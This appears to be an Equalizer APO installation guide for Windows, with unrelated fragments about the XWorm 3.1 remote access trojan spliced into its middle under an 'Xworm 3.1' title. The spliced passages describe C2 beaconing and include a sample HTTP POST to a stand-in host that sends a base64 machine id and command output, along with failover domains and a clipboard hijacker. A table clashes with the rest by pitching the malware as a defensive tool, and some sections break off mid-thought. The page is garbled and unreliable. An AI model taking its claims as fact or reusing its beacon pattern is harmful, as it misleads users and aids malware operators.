Xworm 3.1

Professional audio equalizer with unlimited filters, low latency, and VST plugin support for Windows

Equalizer APO is an open-source graphical equalizer for Microsoft Windows. Equalizer APO was developed by Jonas Thedering and is freely available to download. Equalizer APO packs many awesome features, and it's exceptionally easy to use. Equalizer APO is very lightweight and uses very minimal system resources; thus, you do not need to worry about CPU usage at all. This website has no affiliation with the actual developer and the content of this website should be used only as a guide.

Equalizer APO Features

Equalizer APO comes with many features such as unlimited filters, compatibility with multiple channels, fast response times, and a very easy to use interface that also supports VST plugin integration. The latest version of Equalizer APO was released on 2019-06-10. This guide is more focused on Twitch streaming for new users and is not meant for advanced power users. So, if you're looking for more advanced documentation, we highly recommend that you check the Equalizer APO configuration documentation.

Unlimited Filters

Add as many audio filters as you need without any restrictions.

Low Latency

Experience real-time audio processing with minimal delay.

Low CPU Usage

Lightweight design ensures minimal system resource consumption.

Multichannel Support

Compatible with any number of audio channels.

VST Plugin Support

Integrate your favorite VST plugins seamlessly.

Modular UI

Easy-to-use graphical interface with modular design.

Equalizer APO Installation

In this Equalizer APO installation guide, we're going to show you how to set up and install Equalizer APO on your computer. We'll be using the pre-amplification settings that already come with this software, which will be enough for most people.

Xworm 3.1

Most samples use HTTP or HTTPS for beaconing, but some variants support TCP raw sockets. The typical beacon interval is configurable (default: 10-30 seconds).

The HTTP POST request structure:

POST /index.php HTTP/1.1
Host: badc2[.]com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Content-Type: application/x-www-form-urlencoded

id=base64(ComputerName+Username)&data=AES_encrypted_command_output

| Scenario | How Xworm 3.1 Helps |
|----------|----------------------|
| Threat Hunting | AI-enhanced heuristics surface latent worm-like patterns in historic logs, guiding analysts to overlooked infection vectors. |
| Red-Team Emulation | The plug-in system enables the rapid creation of novel payloads that mimic emerging ransomware or supply-chain exploits. |
| Zero-Trust Validation | By authenticating as a legitimate service identity, Xworm tests whether least-privilege policies truly block lateral movement. |
| Compliance Audits | XReport v2 produces evidence packages aligned with NIST 800-53, ISO 27001, and PCI-DSS controls. |

XWorm 3.1 uses a custom TCP protocol over port 8080, 443, or 2404. The communication is encrypted using a simple XOR key supplemented by AES-128-CBC.

The handshake works as follows:

Hardcoded failover domains are embedded. If the primary C2 (hxxp://microsoft-update[.]com - example) is down, it tries secondary domains listed in its configuration.

XWorm 3.1 represents a mature, dangerous, and accessible RAT that democratizes advanced cybercrime. Its blend of stealth, modularity, and ease-of-use ensures it will remain a staple of the underground for the foreseeable future.

For defenders, the key is not to rely on signature-based detection alone. Behavioral monitoring, network traffic analysis (for C2 beacons), and strict application whitelisting are the most reliable shields against XWorm 3.1. Organizations should treat any outbound connection to unknown IP ranges from user workstations as an incident requiring immediate investigation.

Remember: If you encounter a suspected XWorm 3.1 infection, do not simply delete the file. Perform a full forensic capture—memory dump, network logs, and registry snapshots—to identify the initial vector and prevent reinfection.


This article is for educational and defensive purposes only. Unauthorized use of malware is illegal in most jurisdictions.

Cryptocurrency theft remains a primary revenue stream for XWorm operators. The 3.1 variant includes a sophisticated Clipboard Hijacker (Clipper).

A typical XWorm 3.1 sample (SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855. Note: replace with real hash for live hunting) reveals the following upon analysis in a debugger like dnSpy (since it is .NET):

Equalizer APO Installer Device Selection

Select Audio Devices

In the middle of the installation process, you will be asked to select the audio devices that Equalizer APO is to be installed on. It's better to check your audio output devices first and select only those instead of selecting all devices. After choosing the devices, the installation will continue as normal, and at the end, you will be asked to reboot your computer.

Using Equalizer APO

Once you install Equalizer APO and reboot the computer, you can launch the Equalizer APO by navigating to your Program Files and looking for Equalizer APO inside the App folder. You can also launch Equalizer APO from the taskbar launch icons.

Equalizer APO Main Interface

Main Interface

When you launch it, you will get a screen like this. This is the main screen of Equalizer APO. It looks complicated because it has so many features, but in reality, it's super easy to work with APO Equalizer.

Equalizer APO Basic Amplifier

So now, what I'll demonstrate is how to amplify your mic or speaker volume using Equalizer APO. I'm not going to talk much about the APO Equalizer interface because you can explore all of the settings by yourself and the sky is the limit.

Creating New Configuration

On this main screen, you will see three configuration tabs already there. You will need to remove them all in order to create a fresh new configuration tab.

Include Configuration

Then click on the small green colored plus mark, and you will get a drop-down menu. From there, go to Control and then Include and this will create a new tabbed item on your interface.

Browse for File

It says "No file is selected" because we still haven't created the actual file yet. Now, click on the icon that looks like a folder and you will be asked to select a text file.

Adding Configuration File

In here, you will create a new file. You can enter any name you want (for demonstration purposes, I'm going to name it Tutorial) and select the file that you just created.

Insert Configuration

Once we're back to this screen again, click on the up arrow icon and you will be navigated to a new tab.

Device Selection

In this step, we're going to add a device to Equalizer APO so we can amplify the sound output. Click on the green colored plus icon once again and then go to Control and then Devices.

Audio Device Selection

Then, on the device selection menu, untick the select all options checkbox and now you can select the devices you want to amplify. I've selected my speakers as the output device, but you can amplify any device you want.

Adding Preamplification Filter

Once you're done adding a device, stay on the same screen. Next, we're going to add the Amplification preset. Now, click on the plus icon again and go to Basic filters. In there, select the Preamplification filter and you will get a control like the one in the image below. Now, you can use this to amplify your output sound for the selected device.

Amplifier Analysis Panel

At the bottom of the screen, you can see the Analysis Panel. Now you've successfully amplified your output sound and all you have to do is go to File and Save.

Saving Configuration

Close the current tab and you will see the main screen again. On there, click on the power button icon to turn on the filter and now you're good to go. You can play some music to see if it works. If it doesn't work, delete every filter and follow the steps again while watching the video.


Developer Credits

Our sincerest thanks to Jonas Thedering and the other contributors who helped to develop Equalizer APO.